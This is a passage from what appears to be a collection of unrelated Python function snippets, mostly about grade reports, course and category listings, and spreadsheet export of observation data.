min_time))])\n rows.append([\"\"])\n rows.append([\"Time budget\"])\n\n if mode == \"by_behavior\":\n\n rows.append(fields + [\"% of total length\"])\n # data.headers = fields + [\"% of total media length\"]\n\n for row in out:\n values = []\n for field in fields:\n values.append(str(row[field]).replace(\" ()\", \"\"))\n\n # % of total time\n if row[\"duration\"] not in [\"NA\", \"-\", UNPAIRED, 0] and selectedObsTotalMediaLength:\n # if row[\"duration\"] != \"-\" and row[\"duration\"] != 0 and row[\"duration\"] != UNPAIRED and selectedObsTotalMediaLength:\n values.append(round(row[\"duration\"] / float(max_time - min_time) * 100, 1))\n '''\n if len(selectedObservations) > 1:\n values.append(round(row[\"duration\"] / float(selectedObsTotalMediaLength) * 100, 1))\n else:\n values.append(round(row[\"duration\"] / float(max_time - min_time) * 100, 1))\n '''\n else:\n values.append(\"-\")\n\n rows.append(values)\n\n if mode == \"by_category\":\n rows.append = fields\n # 
data.headers = fields # + [\"% of total media length\"]\n for subject in categories:\n\n for category in categories[subject]:\n values = []\n values.append(subject)\n if category == \"\":\n values.append(\"No category\")\n else:\n values.append(category)\n\n values.append(categories[subject][category][\"number\"])\n values.append(categories[subject][category][\"duration\"])\n\n rows.append(values)\n\n data = tablib.Dataset()\n data.title = obsId\n for row in rows:\n data.append(complete(row, max([len(r) for r in rows])))\n\n if \"xls\" in outputFormat:\n for forbidden_char in EXCEL_FORBIDDEN_CHARACTERS:\n data.title = data.title.replace(forbidden_char, \" \")\n\n if flagWorkBook:\n for forbidden_char in EXCEL_FORBIDDEN_CHARACTERS:\n data.title = data.title.replace(forbidden_char, \" \")\n if \"xls\" in outputFormat:\n if len(data.title) > 31:\n data.title = data.title[:31]\n workbook.add_sheet(data)\n\n else:\n\n fileName = exportDir + os.sep + safeFileName(obsId) + \".\" + extension\n\n if outputFormat in [\"tsv\", \"csv\", \"html\"]:\n with open(fileName, \"wb\") as f:\n f.write(str.encode(data.export(outputFormat)))\n\n if outputFormat == \"od spreadsheet\":\n with open(fileName, \"wb\") as f:\n f.write(data.ods)\n\n if outputFormat == \"xlsx spreadsheet\":\n with open(fileName, \"wb\") as f:\n f.write(data.xlsx)\n\n if outputFormat == \"xls legacy\":\n if len(data.title) > 31:\n data.title = data.title[:31]\n QMessageBox.warning(None, programName, (\n \"The worksheet name <b>{0}</b> was shortened to <b>{1}</b> due to XLS format limitations.\\n\"\n \"The limit on worksheet name length is 31 characters\").format(obsId, data.title),\n QMessageBox.Ok | QMessageBox.Default, QMessageBox.NoButton)\n\n with open(fileName, \"wb\") as f:\n f.write(data.xls)\n\n if mode == \"synthetic\":\n if extension in [\"tsv\", \"csv\", \"html\"]:\n with open(fileName, \"wb\") as f:\n f.write(str.encode(data_report.export(extension)))\n if extension in [\"ods\", \"xlsx\", \"xls\"]:\n with open(fileName, \"wb\") as f:\n f.write(data_report.export(extension))\n\n if mode in [\"by_behavior\", \"by_category\"] and flagWorkBook:\n if \"xls\" in outputFormat:\n with open(WBfileName, \"wb\") as f:\n f.write(workbook.xlsx)\n if \"od\" in outputFormat:\n with open(WBfileName, \"wb\") as f:\n f.write(workbook.ods)", "def __statistics_disciplines_graded(self):\n disciplines_list = self.__grade_controller.get_list_of_graded_disciplines()\n if len(disciplines_list) == 0:\n print(\"There is no graded discipline!\")\n return\n\n for discipline in disciplines_list:\n print(str(discipline) + \"\\n\")", "def PrintCategoryScore(Cat):\r\n print()\r\n print(\"########## Individual Category Results ##########\")\r\n for i in range(len(Cat)): # prints out the results per category \r\n print()\r\n print(Cat[i])\r\n print(CategoryScore(Cat[i]))\r\n print()\r\n return print(\"----- End of Individuals Category Results -----\")", "def get_award_list(actioncluster):\n award_queryset = (ActionClusterAward.objects\n .select_related('award').filter(actioncluster=actioncluster))\n return [a.award for a in award_queryset]", "def extract_abilities(self):\n titleLabel = QLabel(\"Ability Scores\")\n titleLabel.setStyleSheet('font: 20pt \"Imprint MT Shadow\"; color: #ffffff;')\n grid = QGridLayout()\n self.filterVbox.addWidget(titleLabel, alignment=Qt.AlignCenter)\n self.filterVbox.addLayout(grid)\n\n counter = 0\n abilities = [\"Strength\", \"Dexterity\", \"Constitution\", \"Intelligence\", \"Wisdom\", \"Charisma\"]\n for [minVal, maxVal] in 
self.filters[\"Abilities\"].values():\n nextLabel = QLabel(f\"{abilities[counter]} - Between {str(minVal)} & {str(maxVal)}\")\n nextLabel.setStyleSheet('font: 12pt \"Times New Roman\"; color: rgb(188, 189, 177);')\n grid.addWidget(nextLabel, math.floor(counter / 2), counter % 2, alignment=Qt.AlignCenter)\n counter += 1", "def print_tod_accomplishments(accomplishments):\n print(Colors.BLUE + \"Accomplishments from Tod:\" + Colors.NORMAL)\n for accomplishment in accomplishments:\n print(Colors.CYAN + '* ' + Colors.NORMAL + accomplishment)", "def Subcategories():\n subcat = {\n \t\"Featured\": 0,\n \t\"All\": 1,\n \t\"Collectibles\": 2,\n \t\"Clothing\": 3,\n \t\"BodyParts\": 4,\n \t\"Gear\": 5,\n \t\"Models\": 6,\n \t\"Plugins\": 7,\n \t\"Decals\": 8,\n \t\"Hats\": 9,\n \t\"Faces\": 10,\n \t\"Packages\": 11,\n \t\"Shirts\": 12,\n \t\"Tshirts\": 13,\n \t\"Pants\": 14,\n \t\"Heads\": 15,\n \t\"Audio\": 16,\n \t\"RobloxCreated\": 17,\n \t\"Meshes\": 18,\n \t\"Accessories\": 19,\n \t\"HairAccessories\": 20,\n \t\"FaceAccessories\": 21,\n \t\"NeckAccessories\": 22,\n \t\"ShoulderAccessories\": 23,\n \t\"FrontAccessories\": 24,\n \t\"BackAccessories\": 25,\n \t\"WaistAccessories\": 26,\n \t\"AvatarAnimations\": 27,\n \t\"ClimbAnimations\": 28,\n \t\"FallAnimations\": 30,\n \t\"IdleAnimations\": 31,\n\t \"JumpAnimations\": 32,\n\t \"RunAnimations\": 33,\n \t\"SwimAnimations\": 34,\n \t\"WalkAnimations\": 35,\n \t\"AnimationPackage\": 36,\n \t\"Bundles\": 37,\n \t\"AnimationBundles\": 38,\n\t \"EmoteAnimations\": 39,\n\t \"CommunityCreations\": 40,\n\t \"Video\": 41,\n\t \"Recommended\": 51\n }\n return subcat", "def gradeReport(course):\n report = []\n for student in course.allStudents():\n total = 0.0\n numberOfGrades = 0\n for grade in course.getGrades(student):\n total += grade\n numberOfGrades += 1\n \n try:\n average = total / numberOfGrades\n report.append(str(student) + \"'s mean grade is \" + str(average))\n except ZeroDivisionError:\n report.append(str(student) + \" has no grades\")\n \n return '\\n'.join(report)", "def get_queryset(self):\n return Objective.objects.filter(perspective__description='Learning and Capacity').order_by('code')", "def get_knowledge_category_terms(self):\n return # osid.grading.GradeQueryInspector", "def get_list(self):\n categories = []\n for attribut in self.attributes:\n attr = getattr(self, attribut, False)\n if attr is True:\n categories.append(attribut)\n if getattr(self, 'education') is True:\n categories.append(_(u'education'))\n if getattr(self, 'training') is True:\n categories.append(_(u'training'))\n if getattr(self, 'tutoring') is True:\n categories.append(_(u'tutoring'))\n\n return categories", "def graph_course(self):\n group = self.__data[\"filted_general_groupby\"]\n graph = {}\n if self.analysis[\"courses\"] is None:\n self.courses_list()\n\n # inicializa o dicionario que vai guardar o grafico\n for course in self.analysis[\"courses\"].index:\n graph[course] = []\n\n for i in range(18):\n min_v = i * 5\n max_v = min_v + 4.99\n self.__calc_graph_mean(group, min_v, max_v, graph)\n\n min_v = 95\n max_v = 100\n self.__calc_graph_mean(group, min_v, max_v, graph)\n\n self.analysis[\"graph_course\"] = graph", "def toughCategory():\n return prepJSON(cs411_dash.toughCategory())", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def get_attributes(cls, entity):\n return entity.category.facts.all()", "def get_categs_section(sect):\n return Category.objects.filter(section__section=sect)", "def 
get_queryset(self):\n return Initiative.objects.filter(objective__perspective__description='Capacity').order_by('objective')", "def items(self, course):\r\n pass", "def get_section_grades(self, section, section_goal=False):\n if not section_goal:\n SECTION_GRADES = \"\"\"SELECT count_ap, count_a, count_am, count_bp, count_b, count_bm, count_cp, count_c, count_cm, count_dp, count_d, count_dm, count_f,count_i, count_w FROM SectionGrades WHERE course = %s AND semester = %s AND year = %s AND section_id = %s\"\"\"\n else:\n SECTION_GRADES = \"\"\"SELECT count_ap, count_a, count_am, count_bp, count_b, count_bm, count_cp, count_c, count_cm, count_dp, count_d, count_dm, count_f FROM SectionGoalGrades WHERE course = %s AND semester = %s AND year = %s AND section_id = %s AND goal_id = %s\"\"\"\n\n ret = None\n #try:\n if not section_goal:\n self.db_cursor.execute(\n SECTION_GRADES,\n (section.course_name, section.semester, section.year, section.section_id))\n else:\n self.db_cursor.execute(\n SECTION_GRADES,\n (section.course, section.semester, section.year, section.section_id, section.goal_id))\n section_grades = self.db_cursor.fetchall()\n if len(section_grades) > 0 and not section_goal:\n ret = SectionGrades()\n ret.section_id = section.section_id\n ret.semester = section.semester\n ret.year = section.year\n ret.course = section.course_name\n ret.count_ap = section_grades[0][0]\n ret.count_a = section_grades[0][1]\n ret.count_am = section_grades[0][2]\n ret.count_bp = section_grades[0][3]\n ret.count_b = section_grades[0][4]\n ret.count_bm = section_grades[0][5]\n ret.count_cp = section_grades[0][6]\n ret.count_c = section_grades[0][7]\n ret.count_cm = section_grades[0][8]\n ret.count_dp = section_grades[0][9]\n ret.count_d = section_grades[0][10]\n ret.count_dm = section_grades[0][11]\n ret.count_f = section_grades[0][12]\n ret.count_i = section_grades[0][13]\n ret.count_w = section_grades[0][14]\n ret.course = section.course_name\n ret.semester = section.semester\n ret.year = section.year\n ret.section_id = section.section_id\n elif len(section_grades) > 0 and section_goal:\n ret = SectionGoalGrades()\n ret.section_id = section.section_id\n ret.semester = section.semester\n ret.year = section.year\n ret.course = section.course\n ret.goal_id = section.goal_id\n ret.count_ap = section_grades[0][0]\n ret.count_a = section_grades[0][1]\n ret.count_am = section_grades[0][2]\n ret.count_bp = section_grades[0][3]\n ret.count_b = section_grades[0][4]\n ret.count_bm = section_grades[0][5]\n ret.count_cp = section_grades[0][6]\n ret.count_c = section_grades[0][7]\n ret.count_cm = section_grades[0][8]\n ret.count_dp = section_grades[0][9]\n ret.count_d = section_grades[0][10]\n ret.count_dm = section_grades[0][11]\n ret.count_f = section_grades[0][12]\n else:\n ret = None\n\n #except:\n # logging.warning(\"DBAdapter: Error- cannot retrieve section grades: \" + str(id))\n\n return ret", "def test_list_grading_periods_courses(self):\r\n course_id = None # Change me!!\r\n\r\n r = self.client.list_grading_periods_courses(course_id)", "def get_categories():\n page = requests.get(BASE_URL, verify=False)\n soup = BeautifulSoup(page.content)\n output = [{'title': 'Top 10 Courses'}]\n\n for c in soup.find(id='main_aside').findAll('h4'):\n output.append({'title': c.text})\n\n return output", "def amenities(self):\n ats = storage.all(Amenity)\n ltats = []\n for objects in ats.values():\n if self.amenity_ids == objects.id:\n ltats.append(objects)\n return ltats", "def json_export(json_file,gradebook):\n \n try:\n 
import json\n except ImportError:\n warnings.warn('Failed to import json module. Cannot execute json_export')\n return\n if not hasattr(json_file,'write'):\n if not isinstance(json_file,basestring) or not \\\n os.path.exists(os.path.dirname(os.path.abspath(json_file))):\n raise ValueError, 'Argument \\'json_file\\' is not readable, ' \\\n 'and could not be validated as a file path.'\n else:\n json_file = open(json_file,'w+')\n \n if not isinstance(gradebook,Gradebook):\n raise TypeError, 'gradebook argument must be a Gradebook objcet.'\n \n cat_dict = dict(gradebook._Gradebook__categories)\n all_items = []\n for cat_name in cat_dict:\n gr_leest = cat_dict[cat_name].grades.select(docopy=True,aslist=True)\n for i in gr_leest:\n x = {}\n if not isinstance(i,Grade):\n continue\n x['type']='Grade'\n x['name']=i.name\n if i.parent is not None:\n if i.parent.name == cat_name or i.parent.name in cat_dict:\n x['parent'] = i.parent.name\n else:\n x['parent'] = None\n attribs = {}\n attribs['score'] = i.score\n attribs['maximum'] = i.maximum\n attribs['weight'] = i.weight\n attribs['extra_credit'] = i.extra_credit\n if i.overrides:\n attribs['overrides'] = list(i.overrides)\n for ovrrd in i.overrides:\n if not isinstance(overrd,basestring):\n attribs['overrides'].remove(overrd)\n if i.timestamp and isinstance(i.timestamp,datetime.datetime):\n tmstmp = calendar.timegm(i.timestamp.utctimetuple())\n attribs['timestamp'] = tmstmp\n if i.identifiers:\n attribs['identifiers'] = dict(i.identifiers)\n \n x['attribs'] = attribs\n all_items.append(x)\n catt = {'type':'Category','name':cat_name}\n if cat_dict[cat_name].parent is not None:\n catt['parent'] = cat_dict[cat_name].parent.name\n else:\n catt['parent'] = None\n catt['attribs'] = dict(cat_dict[cat_name]._Category__attribs)\n all_items.append(catt)\n \n grbk = {'type':'Gradebook','name':gradebook.name,'user':gradebook.user}\n all_items.append(grbk)\n enc_me = {\"grading\": all_items}\n \n encoder = json.JSONEncoder(indent=4,separators=(', ',': '))\n enc = encoder.encode(enc_me)\n \n json_file.write(enc)\n json_file.close()", "def grade_report(course):\n report = []\n for st in course.get_students():\n try:\n average = sum(course.get_grades(st)) / len(course.get_grades(st))\n report.append(str(st) + '\\'s mean grade is: ' + str(average) + '.')\n except ZeroDivisionError:\n report.append(str(st) + ' has no grades.')\n return '\\n'.join(report)", "def upcoming_courses(aud):\n \n courses = [c for c in aud.all_courses() if c.grade == u\"*\"]\n return [c.number.replace(\"-\", \"\") for c in courses]", "def get_class_grades(class_id):\n\n grades = []\n quiz_grades = query_db(\n \"SELECT people.name, quizzes.name, grade FROM quiz_grades JOIN people \"\n \"ON quiz_grades.student_id=people.id JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE classes.id=?;\",\n [class_id],\n )\n for grade in quiz_grades:\n grade_class = {}\n grade_class[\"student_name\"] = grade[0]\n grade_class[\"thing_name\"] = str(grade[1]) + \" (Quiz)\"\n grade_class[\"grade\"] = grade[2]\n grades.append(grade_class)\n assignment_grades = query_db(\n \"SELECT people.name, assignments.name, grade FROM assignment_grades \"\n \"JOIN people ON assignment_grades.student_id=people.id \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics ON assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE classes.id=?;\",\n 
[class_id],\n )\n for grade in assignment_grades:\n grade_assign = {}\n grade_assign[\"student_name\"] = grade[0]\n grade_assign[\"thing_name\"] = str(grade[1]) + \" (Assignment)\"\n grade_assign[\"grade\"] = grade[2]\n grades.append(grade_assign)\n return grades", "def print_loc_acrnym():\n\n #Method2\n val = College.objects.values('acronym','contact')\n for i in val:\n print(i['acronym'],i['contact'])", "def testAC(self):\n for size in range(5):\n for attr in ('ST', 'DX'):\n a = AttributeAbility([attr,], size + 1)\n self.assertEqual(a.AC, (2000, 4000, 7000, 15000, 25000)[size])\n for attr in ('IQ', 'Dam'):\n a = AttributeAbility([attr,], size + 1)\n self.assertEqual(a.AC, (1000, 2000, 3500, 7000, 15000)[size])\n a = AttributeAbility(['MA',], size + 1)\n self.assertEqual(a.AC, (1000, 2000, 3000, 6000, 12000)[size])\n a = AttributeAbility(['Hit',], size + 1)\n self.assertEqual(a.AC, (1000, 2500, 5000, 10000, 18000)[size])", "def get_category_ratings(self):\n category_ratings = dict()\n for cat_rating in self.category_ratings.all():\n category_ratings[cat_rating.category.name] = cat_rating.rating\n return category_ratings", "def grade_over_time(g_date):\n year_df=g_date.groupby('GRADE DATE')['GRADE']\n gradeOverTime={}\n for name, group in year_df:\n gradeOverTime[name]=collections.Counter(group)\n\n gradeOverTime=pd.DataFrame(gradeOverTime)\n gradeOverTime=pd.DataFrame(gradeOverTime.values.T,columns=gradeOverTime.index,index=[2010,2011,2012,2013,2014])\n \n\n return gradeOverTime", "def get_all_by_category(self, category):\n products = self.db.query(f\"\"\"\n SELECT product.id, product.name, product.nutrition_grade\n from product\n JOIN product_category ON product_category.product_id = product.id\n JOIN category ON product_category.category_id = category.id\n WHERE category.id = :id\n \"\"\", id=category.id).all(as_dict=True)\n return [self.model(**product) for product in products]", "def print_schedule():\n clear_screen()\n print(\"====Current Schedule====\")\n days = ['sun', 'mon', 'tues', 'wed', 'thurs', 'fri', 'sat']\n with open('current_courses.json', 'r') as current_file:\n schedule = json.load(current_file)\n for day in days:\n for val, val2 in schedule.items():\n if day in val2[0]:\n print(day, val, str(val2[1])+'-'+str(val2[2])+\" Presumed Grade: \"+ val2[3])\n return 0", "def get_categories(race_name, event_discipline):\n # FIXME - need to handle pro/elite (cat 0) for MTB\n # FIXME - MTB categories are a disaster and probably need a completely different set of patterns\n cat_match = CATEGORY_RE.search(race_name)\n age_match = AGE_RANGE_RE.search(race_name)\n if age_match:\n return []\n elif cat_match:\n cats = cat_match.group(1).lower().replace('pro', '1')\n if cats in ['beginner', 'novice']:\n cats = '5'\n elif cats == 'c':\n cats = '4'\n elif cats == 'b':\n cats = '3'\n elif cats == 'a':\n cats = '1/2'\n elif cats == 'a/b':\n cats = '1/2/3'\n elif cats == 'b/c':\n cats = '3/4'\n return list(set(int(c) for c in cats.split('/')))\n else:\n return []", "def amenities_all():\n return jsonify(list(map(lambda x: x.to_dict(),\n list(storage.all(Amenity).values()))))", "def course_index(request, course_key):\r\n course_module = _get_course_module(course_key, request.user, depth=3)\r\n lms_link = get_lms_link_for_item(course_module.location)\r\n sections = course_module.get_children()\r\n\r\n\r\n return render_to_response('overview.html', {\r\n 'context_course': course_module,\r\n 'lms_link': lms_link,\r\n 'sections': sections,\r\n 'course_graders': json.dumps(\r\n 
CourseGradingModel.fetch(course_key).graders\r\n ),\r\n 'new_section_category': 'chapter',\r\n 'new_subsection_category': 'sequential',\r\n 'new_unit_category': 'vertical',\r\n 'category': 'vertical'\r\n })", "def list(self, option: str = \"\", short=False, **kwargs):\n courses = self.get_sorted_courses()\n\n if option == \"plain\":\n if short:\n for course in sorted(courses, key=lambda x: x.name + x.type):\n print(f\"{course.name} ({course.type})\")\n else:\n for course in sorted(courses, key=lambda x: x.abbreviation + x.type):\n print(f\"{course.abbreviation}-{course.type[0]}\")\n quit()\n\n current_day = datetime.today()\n current_weekday = current_day.weekday()\n\n # split to scheduled and non-scheduled\n unscheduled = [c for c in courses if c.time is None]\n courses = [c for c in courses if c not in unscheduled]\n\n table = []\n option = option.lower()\n\n for i, course in enumerate(courses):\n # lambda functions to test for various options\n # a is current weekday and b is the course's weekday\n options = {\n \"\": lambda _, __: True, # all of them\n \"t\": lambda a, b: a == b, # today\n \"tm\": lambda a, b: (a + 1) % 7 == b, # tomorrow\n \"mo\": lambda a, b: b == 0,\n \"tu\": lambda a, b: b == 1,\n \"we\": lambda a, b: b == 2,\n \"th\": lambda a, b: b == 3,\n \"fr\": lambda a, b: b == 4,\n \"sa\": lambda a, b: b == 5,\n \"su\": lambda a, b: b == 6,\n }\n\n if option not in options:\n exit_with_error(\"Invalid course-listing option!\")\n\n if options[option](current_weekday, course.weekday()):\n # include the name of the day before first day's course\n if courses[i - 1].time.day != courses[i].time.day:\n weekday = course.time.day.capitalize()\n\n # calculate the next occurrence\n date = (\n current_day\n + timedelta(days=(course.weekday() - current_weekday) % 7)\n ).strftime(\"%-d. 
%-m.\")\n\n table.append([f\"{weekday if not short else weekday[:3]} / {date}\"])\n\n # for possibly surrounding the name with chars if it's ongoing\n name_surround_char = \"•\" if course.is_ongoing() else \"\"\n\n row = [\n f\"{name_surround_char}{course.name if not short else course.abbreviation}{name_surround_char}\",\n f\"{minutes_to_HHMM(course.time.start)} -\"\n f\" {minutes_to_HHMM(course.time.end)}\"\n + (\n \"\"\n if course.time.weeks is None\n else (\n f\" ({course.time.weeks if not short else course.time.weeks[0]})\"\n )\n ),\n \"-\" if course.classroom is None else course.classroom.number,\n ]\n\n # color the course name the appropriate color, depending on its type\n row[0] = Ansi.color(row[0], course_types[course.type].color)\n\n # append useful information\n table.append(row)\n\n # list unscheduled courses only when no options are specified\n if option == \"\" and len(unscheduled) != 0:\n table.append([\"Unscheduled\"])\n for course in unscheduled:\n table.append(\n [\n course.name if not short else course.abbreviation,\n course.type[0],\n \"-\",\n \"-\",\n ]\n )\n\n if len(table) == 0:\n exit_with_error(\"No courses matching the criteria found!\")\n\n print_table(table)", "def showallCategories():\n category = session.query(Category).all()\n onedayearly = datetime.timedelta(hours=24)\n since = datetime.datetime.now() - onedayearly\n latest = session.query(Item).filter(Item.date > since)\n return render_template('category.html', category=category, latest=latest)", "def avg_by_category(self, start_date, end_date):\n data = self.by_date(start_date, end_date)\n\n return data.values('category__name').annotate(avg_value=models.Avg('value')).order_by('category')", "def GetEasiestDisciplines(self):\n dlist = self.DisciplineList\n glist = self.GradeList\n result = []\n for disID in dlist.IDs:\n glist.SetQueryOptions(FilterAttribute=\"DisciplineID\", FilterValue=disID, StrictFilter=False, OrderAttribute=\"ID\", Descending=False)\n if glist.Length(True) == 0:\n continue\n avg = 0\n for gID in glist.QueryIDs:\n avg += glist[gID].Value\n avg /= glist.Length(True)\n result.append((dlist[disID], float(\"%.3f\" % avg)))\n def get_tupl_avg(t):\n return t[1]\n return sorted(result, key=get_tupl_avg, reverse=True)", "def college_selectivity():", "def easyCategory():\n return prepJSON(cs411_dash.easyCategory())", "def get_category_scores(category: Category):\r\n solutions = Solution.objects.filter(challenge__category=category).select_related(\"user\").select_related(\"challenge\")\r\n d = dict()\r\n\r\n for sol in solutions:\r\n d[sol.user] = d.get(sol.user, 0) + sol.get_score()\r\n \r\n return d", "def get_achievement_category_index(self, region, namespace, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/achievement-category/index', region, **filters)", "def compute_overall_opinions(self):\r\n opinions_list = []\r\n global CATEGORIES\r\n i=0\r\n for cat in CATEGORIES:\r\n opinions_list.append([])\r\n for citizen in self.citizens:\r\n opinions_list[i].append(citizen.opinions[cat].weight)\r\n i+=1\r\n \r\n i=0;\r\n for cat in CATEGORIES:\r\n mean = stats.describe(opinions_list[i])[2]\r\n std = math.sqrt(stats.describe(opinions_list[i])[3])\r\n print \"Category: %d - Mean: %f - STD: %f\" % (cat, mean, std)\r\n i+=1", "def categories(self):\n pass", "def get_student_grade(class_id):\n grades = []\n quiz_grade = query_db(\n \"SELECT quizzes.name, grade FROM quiz_grades JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON 
quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id \"\n \"WHERE student_id=? AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in quiz_grade:\n student_grade_quiz = {}\n student_grade_quiz[\"thing_name\"] = grade[0]\n student_grade_quiz[\"grade\"] = grade[1]\n grades.append(student_grade_quiz)\n assignment_grade = query_db(\n \"SELECT assignments.name, grade FROM assignment_grades \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics on assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE student_id=? \"\n \"AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in assignment_grade:\n student_grade_assignment = {}\n student_grade_assignment[\"thing_name\"] = grade[0]\n student_grade_assignment[\"grade\"] = grade[1]\n grades.append(student_grade_assignment)\n return grades", "def __getTypeListByASG( self, asg ):\r\n for (otherASG, typeList) in self.__trackASG.values():\r\n if( asg == otherASG ): \r\n return typeList\r\n return []", "def category(self) -> PracticeCategory:\n return PracticeCategory.PERFORMANCE", "def enumerate_appointments(age, gender, nb=2, price=60.):", "def show_categories():\n for category in NEWS_CATEGORIES:\n print(category)", "def get_subcat_axes():\n cursor = conn.cursor()\n cursor.execute(\n \"\"\"\n SELECT category, sub_category, function, bitmask, gene_name\n FROM genome_rules\n ORDER by category, sub_category\n \"\"\"\n )\n rows = cursor.fetchall()\n subcats = {}\n for k_cat, g_cat in groupby(rows, lambda r: r[0]):\n subcats[k_cat] = {}\n for k_subcat, g_subcat in groupby(g_cat, lambda r: r[1]):\n subcats[k_cat][k_subcat] = []\n for genes in g_subcat:\n subcats[k_cat][k_subcat].append(\n (genes[2], genes[3], genes[4])\n )\n return subcats", "def get_courses(std):\n return std[2]", "def amenity_get_all():\n am_list = []\n am_obj = storage.all(\"Amenity\")\n for obj in am_obj.values():\n am_list.append(obj.to_json())\n\n return jsonify(am_list)", "def average_grade(self):\n grade_sum = 0\n grades_length = 0\n for c in self.courses_grades:\n if c[1] != \"-\":\n grade_sum += int(c[1])\n grades_length += 1\n average = grade_sum / grades_length\n return average", "def super_categories(self):\n R = self.base().base_ring()\n category = GradedHopfAlgebrasWithBasis(R)\n return [Realizations(self.base()), category.Quotients()]", "def get_achievement_category(self, region, namespace, id, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/achievement-category/{0}', region, *[id], **filters)", "def list_course(request, template=\"core/list_course.html\"):\n response = {\n 'morning': Course.objects.at_morning(),\n 'afternoon': Course.objects.at_afternoon(),\n }\n return direct_to_template(request, template, response)", "def get_antags(self):\n antags = []\n for obj in self.antagobjs.group_by(AntagObjective.mindkey):\n antag = {'key': obj.mindkey, 'name': obj.mindname, 'role': obj.special_role}\n antags.append(antag)\n return antags", "def subjectivity():\r\n scores = []\r\n for index, row in topics_data.iterrows():\r\n if index in actual_list:\r\n scores.append(row['score'])\r\n\r\n subs = []\r\n for index, row in topics_data.iterrows():\r\n if index in actual_list:\r\n url = row['url']\r\n if 'newsweek' or 'democracynow' in url:\r\n user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'\r\n config = Config()\r\n 
config.browser_user_agent = user_agent\r\n article = Article(url, config=config)\r\n else:\r\n article = Article(url)\r\n article.download()\r\n article.parse()\r\n article.nlp()\r\n text = article.summary\r\n obj = TextBlob(text)\r\n subjectivity = obj.sentiment.subjectivity\r\n subs.append(subjectivity)\r\n\r\n plt.figure(figsize=(50, 10))\r\n plt.scatter(subs, scores)\r\n plt.xlabel('Subjectivity')\r\n plt.ylabel('Score')\r\n plt.title('Posts in r/politics')\r\n plt.show()", "def show_info(self):\n # attr[0] attr[1]\n attrs = [(self.TYP.value, 'nam'),\n ('Skill', 'skl')]\n # voeg ook alle stats en skills in deze lijst toe.\n for stat in Minimals:\n attrs.append((stat.value, stat.name))\n attrs.append(('Spell Battery', 'cur_bat'))\n for stat in StatType:\n attrs.append((stat.value, stat.name))\n for skill in SkillType:\n attrs.append((skill.value, skill.name))\n\n # nu alle mogelijkheden geladen zijn, ga dan aan de slag met diegene die van toepassing zijn\n attr_list = []\n\n import enum\n for attr in attrs:\n value_of_attr = self.get_value_of(attr[1])\n # uitzondering, 'wht' altijd gewoon weergeven\n if attr[0] == StatType.wht.value:\n # deze uitzondering geldt niet voor weapons en shields.\n if not isinstance(self.get_value_of('skl'), enum.Enum): # niet wanneer 'skl' een waarde heeft\n attr_list.append((attr[0], str(value_of_attr)))\n elif value_of_attr:\n if isinstance(value_of_attr, enum.Enum): # uitzondering alleen voor 'skl'\n value_of_attr = value_of_attr.value\n elif attr[0] == StatType.hit.value: # uitzondering alleen voor 'hit'\n value_of_attr = str(value_of_attr)+\"%\"\n attr_list.append((attr[0], str(value_of_attr)))\n\n return attr_list", "def area_attractions(request, pk):\n try:\n area = Area.objects.get(pk=pk)\n except Area.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n attractions = Attraction.objects.filter(area__pk=pk)\n serializer = AttractionSerializer(attractions, many=True)\n return JSONResponse(serializer.data)\n\n return JSONResponse(status=403)", "def Categories():\n cat = {\n \t \"Featured\": 0,\n \t \"All\": 1,\n \t \"Collectibles\": 2,\n \t \"Clothing\": 3,\n \t \"BodyParts\": 4,\n \t \"Gear\": 5,\n \t \"Models\": 6,\n \t \"Plugins\": 7,\n\t \"Decals\": 8,\n \t \"Audio\": 9,\n \t \"Meshes\": 10,\n\t \"Accessories\": 11,\n\t \"AvatarAnimations\": 12,\n\t \"CommunityCreations\": 13,\n\t \"Video\": 14,\n\t \"Recommended\": 15\n }\n return cat", "def get_ag_access(accees_group_id):\n\n\trooms = Room.query \\\n\t\t.join(CardReader, CardReader.room_b_id == Room.id) \\\n\t\t.join(gives_access_to, gives_access_to.c.cr_id == CardReader.id) \\\n\t\t.filter_by(ag_id=accees_group_id)\n\n\tdata = {\"rooms\": [room.text_id for room in rooms]}\n\n\treturn ok(data)", "def get_category_timetable(categ_ids, start_dt, end_dt, detail_level='event', tz=utc, from_categ=None, grouped=True,\n includible=lambda item: True):\n day_start = start_dt.astimezone(utc)\n day_end = end_dt.astimezone(utc)\n dates_overlap = lambda t: (t.start_dt >= day_start) & (t.start_dt <= day_end)\n\n items = defaultdict(lambda: defaultdict(list))\n\n # first of all, query TimetableEntries/events that fall within\n # specified range of dates (and category set)\n events = _query_events(categ_ids, day_start, day_end)\n if from_categ:\n events = events.filter(Event.is_visible_in(from_categ.id))\n for eid, tt_start_dt in events:\n if tt_start_dt:\n items[eid][tt_start_dt.astimezone(tz).date()].append(tt_start_dt)\n else:\n items[eid] = None\n\n # then, retrieve detailed 
